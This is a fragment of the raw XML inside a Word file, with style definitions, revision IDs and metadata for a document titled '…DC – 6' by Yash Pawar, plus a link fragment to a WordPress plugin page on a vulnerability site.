    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="22C23C8A" w14:textId="77777777" w:rsidR="00924F9E" w:rsidRDefault="00924F9E" w:rsidP="00743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3DD5" w14:textId="765E2E89" w:rsidR="007433B8" w:rsidRDefault="007433B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62C4791" wp14:editId="3BC23AA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103F599" w14:textId="68738D85" w:rsidR="007433B8" w:rsidRDefault="006D434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DC – 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62C479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103F599" w14:textId="68738D85" w:rsidR="007433B8" w:rsidRDefault="006D434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DC – 6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B0F88"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A15E1710"/>
    <w:lvl w:ilvl="0" w:tplc="6D8C316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13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0A"/>
    <w:rsid w:val="00142A5A"/>
    <w:rsid w:val="00191911"/>
    <w:rsid w:val="001C293B"/>
    <w:rsid w:val="003D09BB"/>
    <w:rsid w:val="004001E8"/>
    <w:rsid w:val="006D4347"/>
    <w:rsid w:val="007176A5"/>
    <w:rsid w:val="007433B8"/>
    <w:rsid w:val="00924F9E"/>
    <w:rsid w:val="0093012F"/>
    <w:rsid w:val="0094470A"/>
    <w:rsid w:val="009D4F25"/>
    <w:rsid w:val="00A327B3"/>
    <w:rsid w:val="00A56963"/>
    <w:rsid w:val="00AE064F"/>
    <w:rsid w:val="00AF5033"/>
    <w:rsid w:val="00D40C85"/>
    <w:rsid w:val="00F168F1"/>
    <w:rsid w:val="00F218E6"/>
    <w:rsid w:val="00F46F13"/>
    <w:rsid w:val="00FD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BB8D4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{939B0B3A-64BE-4AA2-A879-56A010C6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7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3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3B8"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007433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3B8"/>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00743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06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pscan.com/plugin/wp-security-audit-log/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B0B739C959491EAE01D79E1AEB4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8347F-3636-4768-BF6B-FB40A0D5D809}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="007C3AC5" w:rsidRDefault="00537609" w:rsidP="00537609">
          <w:pPr>
            <w:pStyle w:val="DEB0B739C959491EAE01D79E1AEB435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83AE1C90AC64D07AE1F9D7A842DC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B275A-77B8-4665-B88C-8DB540B5092B}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="007C3AC5" w:rsidRDefault="00537609" w:rsidP="00537609">
          <w:pPr>
            <w:pStyle w:val="983AE1C90AC64D07AE1F9D7A842DC11C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09"/>
    <w:rsid w:val="001C293B"/>
    <w:rsid w:val="004A49F3"/>
    <w:rsid w:val="00537609"/>
    <w:rsid w:val="007C3AC5"/>
    <w:rsid w:val="00D332F2"/>
    <w:rsid w:val="00FD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B0B739C959491EAE01D79E1AEB4354">
    <w:name w:val="DEB0B739C959491EAE01D79E1AEB4354"/>
    <w:rsid w:val="00537609"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="983AE1C90AC64D07AE1F9D7A842DC11C">
    <w:name w:val="983AE1C90AC64D07AE1F9D7A842DC11C"/>
    <w:rsid w:val="005376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DC – 6</vt:lpstr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DC – 6</dc:title>
  <dc:subject/>
  <dc:creator>Yash Pawar</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Yash Pawar</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-09T16:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-11T15:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>